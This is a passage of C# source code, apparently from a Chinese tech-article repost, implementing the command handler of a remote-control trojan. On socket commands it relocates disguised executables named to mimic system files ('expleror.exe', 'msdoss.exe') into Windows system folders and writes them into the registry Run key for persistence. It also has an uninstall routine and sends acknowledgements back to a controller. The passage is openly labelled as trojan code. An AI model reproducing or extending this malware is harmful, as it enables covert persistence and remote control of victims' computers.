//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以上是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以下是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jy0000")
{
MessageBox.Show(mystr);
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以上是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&
//##################################以下是修改木马位置###################
//||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
if(ss=="mw1000")
{
try{ File.Move("c:\\winnt\\system\\expleror.exe","c:\\winnt\\system32\\msdoss.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
//_____________________________________________________________________
if(ss=="mw0100")
{
try{File.Move("c:\\winnt\\system\\expleror.exe","d:\\winnt\\system32\\microsoftt.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//______________________________________________________________________
//=======================================================================
if(ss=="mw0010")
{
try{File.Move("c:\\winnt\\system32\\msdoss.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("expleror","c:\\winnt\\system\\expleror");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//===================================================================
//*******************************************************************
if(ss=="mw0001")
{
try{File.Move("d:\\winnt\\system32\\microsoftt.exe","c:\\winnt\\system\\expleror.exe");}
catch{}
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");
key1.Close();
}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("expleror","c:\\winnt\\system\\expleror");
key2.Close();
}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//*************************************************************************
//##################################以上是改变位置##########################
//··················以下是卸载木马·················
if(ss=="xz0000")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
try{key1.DeleteValue("expleror");}
catch{}
try{key1.DeleteValue("msdoss");}
catch{}
try{key1.DeleteValue("microsoftt");}
catch{}
key1.Close();
}
catch{}
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//··················以上是卸载木马·················
}//socket
//
// TODO: Add any constructor code after InitializeComponent call
//
}//targett
/// <summary>
/// 清理所有正在使用的资源。
/// </summary>
protected override void Dispose( bool disposing )
{
if( disposing )
{
if (components != null)
{
components.Dispose();
}
}
base.Dispose( disposing );
}
#region Windows Form Designer generated code
/// <summary>
/// 设计器支持所需的方法 - 不要使用代码编辑器修改
/// 此方法的内容。
/// </summary>
private void InitializeComponent()
{
//
// Form1
//
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(292, 266);
this.Name = "Form1";
this.Text = "Form1";
this.Load += new System.EventHandler(this.Form1_Load);
}
#endregion
/// <summary>
/// 应用程序的主入口点。
/// </summary>
[STAThread]
static void Main()
{
Application.Run(new Form1());
}
private void Form1_Load(object sender, System.EventArgs e)
{
}
}
}
本文地址:http://com.8s8s.com/it/it42252.htm